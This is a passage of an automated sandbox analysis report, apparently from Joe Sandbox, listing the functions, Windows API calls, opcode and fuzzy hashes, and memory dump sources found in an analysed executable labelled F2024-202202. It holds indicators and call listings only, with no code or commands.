              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
              • String ID:
              • API String ID: 1211466189-0
              • Opcode ID: c45cb2309676b1601288ccee0995c97d468ece8b555fa94370eb1223f0b64dc1
              • Instruction ID: a5856079a3ec379c4f212119d19f3bbe8401de634e03a7c6924a17f450eba9c6
              • Opcode Fuzzy Hash: c45cb2309676b1601288ccee0995c97d468ece8b555fa94370eb1223f0b64dc1
              • Instruction Fuzzy Hash: CDB1897560132AEFDF14CFA8C9897AE7BB1BF44701F088069EC489B696D734A960CB50
              Function 00182A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
              Download Yara Rule
              APIs
              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,001BC417,00000004,00000000,00000000,00000000), ref: 00182ACF
              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,001BC417,00000004,00000000,00000000,00000000,000000FF), ref: 00182B17
              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,001BC417,00000004,00000000,00000000,00000000), ref: 001BC46A
              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,001BC417,00000004,00000000,00000000,00000000), ref: 001BC4D6
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ShowWindow
              • String ID:
              • API String ID: 1268545403-0
              • Opcode ID: 6796572a9206189177c8a4480b2aba4b4e455df5724616476f2becf0a0dbc4bb
              • Instruction ID: 24c97eb1f86a142c152f0ecc75ab3d8f6624772a857456b518998e8111f436ad
              • Opcode Fuzzy Hash: 6796572a9206189177c8a4480b2aba4b4e455df5724616476f2becf0a0dbc4bb
              • Instruction Fuzzy Hash: 3C413934204780AAC73FAB28DD9CBBB7B92AF96300F15881DE05787D61C7759A41CF51
              Function 001E7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
              Download Yara Rule
              APIs
              • InterlockedExchange.KERNEL32(?,000001F5), ref: 001E737F
                • Part of subcall function 001A0FF6: std::exception::exception.LIBCMT ref: 001A102C
                • Part of subcall function 001A0FF6: __CxxThrowException@8.LIBCMT ref: 001A1041
              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001E73B6
              • EnterCriticalSection.KERNEL32(?), ref: 001E73D2
              • _memmove.LIBCMT ref: 001E7420
              • _memmove.LIBCMT ref: 001E743D
              • LeaveCriticalSection.KERNEL32(?), ref: 001E744C
              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 001E7461
              • InterlockedExchange.KERNEL32(?,000001F6), ref: 001E7480
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
              • String ID:
              • API String ID: 256516436-0
              • Opcode ID: f7da33303f5ab9c7e4cf34d8b740975924be2e29cd29fbf13ee6e2faf32c2239
              • Instruction ID: 3e133e0765a923a026a13aeae8faabf274fd01cf49e4ee2dbc078306d98f97c0
              • Opcode Fuzzy Hash: f7da33303f5ab9c7e4cf34d8b740975924be2e29cd29fbf13ee6e2faf32c2239
              • Instruction Fuzzy Hash: 1E317E35904205EFDF50EF65DD89AAEBB78EF45710F1441A9FD04AB286DB709E10CBA0
              Function 00206442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
              Download Yara Rule
              APIs
              • DeleteObject.GDI32(00000000), ref: 0020645A
              • GetDC.USER32(00000000), ref: 00206462
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0020646D
              • ReleaseDC.USER32(00000000,00000000), ref: 00206479
              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002064B5
              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002064C6
              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00209299,?,?,000000FF,00000000,?,000000FF,?), ref: 00206500
              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00206520
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
              • String ID:
              • API String ID: 3864802216-0
              • Opcode ID: b58eee01cf4a2e2e00117d40eaf7f73835e6065064e31329c812ad329980e0dd
              • Instruction ID: 2a27d62def95cc917f9b44a9f7ad5d81e203a2796739ce62a25c6007bf66b8db
              • Opcode Fuzzy Hash: b58eee01cf4a2e2e00117d40eaf7f73835e6065064e31329c812ad329980e0dd
              • Instruction Fuzzy Hash: C5319F72240210BFEB218F10DD4AFEA3FADEF09761F044065FE089A196C6759C51CB60
              Function 001DC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: ba3fdee905d06de85ab8c5b473cce2081dad0f04821ab681485af50a0d4bba61
              • Instruction ID: 052b936f50ba2877a51d65145f805bf3fc1d13e4eb5c08afa7c5d5a7c8ddd5fa
              • Opcode Fuzzy Hash: ba3fdee905d06de85ab8c5b473cce2081dad0f04821ab681485af50a0d4bba61
              • Instruction Fuzzy Hash: 9221D479A50217FBD214A5209C42FFB239CAF32394F184422FE09D6382EB91DE35C6E5
              Function 001EED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
                • Part of subcall function 0019FEC6: _wcscpy.LIBCMT ref: 0019FEE9
              • _wcstok.LIBCMT ref: 001EEEFF
              • _wcscpy.LIBCMT ref: 001EEF8E
              • _memset.LIBCMT ref: 001EEFC1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
              • String ID: X
              • API String ID: 774024439-3081909835
              • Opcode ID: 1e28f6e3fbf9aba382c5b7b08c4a56e90dc3ae2b5b13df3b4fdc979d8bbdfd8b
              • Instruction ID: 7d75d0069501c0a0eb49890ffe5ffc009638799bb7260abd524c3da6b5b8e258
              • Opcode Fuzzy Hash: 1e28f6e3fbf9aba382c5b7b08c4a56e90dc3ae2b5b13df3b4fdc979d8bbdfd8b
              • Instruction Fuzzy Hash: E9C16A755087409FC724EF24C881A6EB7E4BF95314F14492DF8999B2A2DB70EE45CF82
              Function 001F6E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
              Download Yara Rule
              APIs
              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 001F6F14
              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001F6F35
              • WSAGetLastError.WSOCK32(00000000), ref: 001F6F48
              • htons.WSOCK32(?,?,?,00000000,?), ref: 001F6FFE
              • inet_ntoa.WSOCK32(?), ref: 001F6FBB
                • Part of subcall function 001DAE14: _strlen.LIBCMT ref: 001DAE1E
                • Part of subcall function 001DAE14: _memmove.LIBCMT ref: 001DAE40
              • _strlen.LIBCMT ref: 001F7058
              • _memmove.LIBCMT ref: 001F70C1
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
              • String ID:
              • API String ID: 3619996494-0
              • Opcode ID: f3377ab79294b25897fd05c4a0014252df0e57e0c34067ac4176db8207a58d76
              • Instruction ID: 96be6a5b9023940942a20e174400b27e018bb5e52211b1d928cc7357e4e5930a
              • Opcode Fuzzy Hash: f3377ab79294b25897fd05c4a0014252df0e57e0c34067ac4176db8207a58d76
              • Instruction Fuzzy Hash: B081CE32508304ABD714EB24CC85E7BB3E9AFA5714F144A1DF6559B2E2DB71AE00CB92
              Function 00181424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 45fbafec2ab11aa7e8b1a3778c1ec8743f83b73eca3c24fa87fa8dada116c318
              • Instruction ID: f79d7cf0953ad7158a7bcb5877c53fb74a98cb7a434d19a2839ed598fd0bd133
              • Opcode Fuzzy Hash: 45fbafec2ab11aa7e8b1a3778c1ec8743f83b73eca3c24fa87fa8dada116c318
              • Instruction Fuzzy Hash: 6F717E72900109FFCB14DF98CC89ABEBB79FF85314F148159F915AA251C730AA52CFA0
              Function 0020B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
              Download Yara Rule
              APIs
              • IsWindow.USER32(014260A8), ref: 0020B6A5
              • IsWindowEnabled.USER32(014260A8), ref: 0020B6B1
              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0020B795
              • SendMessageW.USER32(014260A8,000000B0,?,?), ref: 0020B7CC
              • IsDlgButtonChecked.USER32(?,?), ref: 0020B809
              • GetWindowLongW.USER32(014260A8,000000EC), ref: 0020B82B
              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0020B843
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
              • String ID:
              • API String ID: 4072528602-0
              • Opcode ID: 1fb5cc884d1e6f3b4e2042461e9e63443802ae5dbf3460706a2e843b4b8023bd
              • Instruction ID: f2fa27229ddf73b4a9cac1310df8d22edef09868efe266a2c70f5f79d9023feb
              • Opcode Fuzzy Hash: 1fb5cc884d1e6f3b4e2042461e9e63443802ae5dbf3460706a2e843b4b8023bd
              • Instruction Fuzzy Hash: 8F71C234610305AFDB36DF64C898FAABBB9EF49300F044069E955972E2C732A861CF50
              Function 001FF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 001FF75C
              • _memset.LIBCMT ref: 001FF825
              • ShellExecuteExW.SHELL32(?), ref: 001FF86A
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
                • Part of subcall function 0019FEC6: _wcscpy.LIBCMT ref: 0019FEE9
              • GetProcessId.KERNEL32(00000000), ref: 001FF8E1
              • CloseHandle.KERNEL32(00000000), ref: 001FF910
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
              • String ID: @
              • API String ID: 3522835683-2766056989
              • Opcode ID: da9cc0fe832a9201c514478d38204cafd1ad4c4dfd651e03d7abd8ac669b5bc2
              • Instruction ID: 483973f159ab079d9ac0d4af67c3d8a9ebde5efdf2ff71d65377b1987a977230
              • Opcode Fuzzy Hash: da9cc0fe832a9201c514478d38204cafd1ad4c4dfd651e03d7abd8ac669b5bc2
              • Instruction Fuzzy Hash: 85619B75A006199FCB14EF94C584AAEBBF0FF58314B14846DE95AAB351CB70AE42CF90
              Function 001E145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
              Download Yara Rule
              APIs
              • GetParent.USER32(?), ref: 001E149C
              • GetKeyboardState.USER32(?), ref: 001E14B1
              • SetKeyboardState.USER32(?), ref: 001E1512
              • PostMessageW.USER32(?,00000101,00000010,?), ref: 001E1540
              • PostMessageW.USER32(?,00000101,00000011,?), ref: 001E155F
              • PostMessageW.USER32(?,00000101,00000012,?), ref: 001E15A5
              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001E15C8
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessagePost$KeyboardState$Parent
              • String ID:
              • API String ID: 87235514-0
              • Opcode ID: 791273abf0686e0cc7e534e65846c74d411db50f10b6cd318d4df1646564ad62
              • Instruction ID: 132f899558b66fa88a9e84b3f9c2931d758ef4eb26fa7d0e1827516c8d394c78
              • Opcode Fuzzy Hash: 791273abf0686e0cc7e534e65846c74d411db50f10b6cd318d4df1646564ad62
              • Instruction Fuzzy Hash: EE51DFB0A44BD53EFB3642268C45BBEBEA96F46304F088589E5D6468C2C3E8AC84D750
              Function 001E1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
              Download Yara Rule
              APIs
              • GetParent.USER32(00000000), ref: 001E12B5
              • GetKeyboardState.USER32(?), ref: 001E12CA
              • SetKeyboardState.USER32(?), ref: 001E132B
              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 001E1357
              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 001E1374
              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001E13B8
              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001E13D9
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessagePost$KeyboardState$Parent
              • String ID:
              • API String ID: 87235514-0
              • Opcode ID: a4e04208fef3d422214bec7aa1fe4bced846b629bcdb3f2aa1cc069c36432f6b
              • Instruction ID: 4e198f97877d1f9b237af0f9c9e4d45198a7f24cedabba0de364e5cc1bf511e0
              • Opcode Fuzzy Hash: a4e04208fef3d422214bec7aa1fe4bced846b629bcdb3f2aa1cc069c36432f6b
              • Instruction Fuzzy Hash: 5251F3B1944BD53DFB3283268C45BBEBFA96F06310F088589E1D54ACC2D3A5EC98D760
              Function 001E589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _wcsncpy$LocalTime
              • String ID:
              • API String ID: 2945705084-0
              • Opcode ID: 5d69a6e59bc099d35d4d749c33d021d8f246f3d34730597c417b1b47805f193e
              • Instruction ID: ca155e18408735c2a563767675aabb7fb90bfddaae6b3dd7e103d67db40d91e7
              • Opcode Fuzzy Hash: 5d69a6e59bc099d35d4d749c33d021d8f246f3d34730597c417b1b47805f193e
              • Instruction Fuzzy Hash: C941D4A9C2061876CB10EBF5CC86ADFB7A99F56310F508462F918E3122F734E754C7A9
              Function 001DDA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
              Download Yara Rule
              APIs
              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001DDAC5
              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001DDAFB
              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001DDB0C
              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001DDB8E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorMode$AddressCreateInstanceProc
              • String ID: ,,!$DllGetClassObject
              • API String ID: 753597075-108149451
              • Opcode ID: c65d1a5dbb1aa503d1db16efd88fa3a84014adde8ef04c29ea37cd54c9f81974
              • Instruction ID: cd3b312a91e27b8e5b8bf1176ed96571fe8f254f08ed4e9c858e4c113657a3fa
              • Opcode Fuzzy Hash: c65d1a5dbb1aa503d1db16efd88fa3a84014adde8ef04c29ea37cd54c9f81974
              • Instruction Fuzzy Hash: E1417FB1600308EFDB15CF54D884A9ABBA9EF45314F1681ABED099F306D7B1DD44CBA0
              Function 001E38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001E38D3,?), ref: 001E48C7
                • Part of subcall function 001E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001E38D3,?), ref: 001E48E0
              • lstrcmpiW.KERNEL32(?,?), ref: 001E38F3
              • _wcscmp.LIBCMT ref: 001E390F
              • MoveFileW.KERNEL32(?,?), ref: 001E3927
              • _wcscat.LIBCMT ref: 001E396F
              • SHFileOperationW.SHELL32(?), ref: 001E39DB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
              • String ID: \*.*
              • API String ID: 1377345388-1173974218
              • Opcode ID: 5ec6ac293d6c033431e9436f1f1adfd009dab99153a8ce2f73d46f57a30fa19c
              • Instruction ID: f825d2f9618112a9466f22da75276c74eb31a96641b5b0816db24efc81bbcd34
              • Opcode Fuzzy Hash: 5ec6ac293d6c033431e9436f1f1adfd009dab99153a8ce2f73d46f57a30fa19c
              • Instruction Fuzzy Hash: 8C41ADB24083849EC751EF65C485AEFB7E8AF99340F10182EF49AC3152EB74D688CB52
              Function 00207500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 00207519
              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002075C0
              • IsMenu.USER32(?), ref: 002075D8
              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00207620
              • DrawMenuBar.USER32 ref: 00207633
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Menu$Item$DrawInfoInsert_memset
              • String ID: 0
              • API String ID: 3866635326-4108050209
              • Opcode ID: c27bd8b986c637a22f6ac18738166ef76ed6286dca4717ffcadba157cc49eb1d
              • Instruction ID: 30a31b0813ed1c16e4c4fc8f3502f8ef97908afb6f1cf84fe065d97f3d7de35c
              • Opcode Fuzzy Hash: c27bd8b986c637a22f6ac18738166ef76ed6286dca4717ffcadba157cc49eb1d
              • Instruction Fuzzy Hash: AA414A75A14709EFDB20DF54E884E9ABBF8FB05314F448029F92697291D731AD60CF90
              Function 0020122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
              Download Yara Rule
              APIs
              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0020125C
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00201286
              • FreeLibrary.KERNEL32(00000000), ref: 0020133D
                • Part of subcall function 0020122D: RegCloseKey.ADVAPI32(?), ref: 002012A3
                • Part of subcall function 0020122D: FreeLibrary.KERNEL32(?), ref: 002012F5
                • Part of subcall function 0020122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00201318
              • RegDeleteKeyW.ADVAPI32(?,?), ref: 002012E0
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
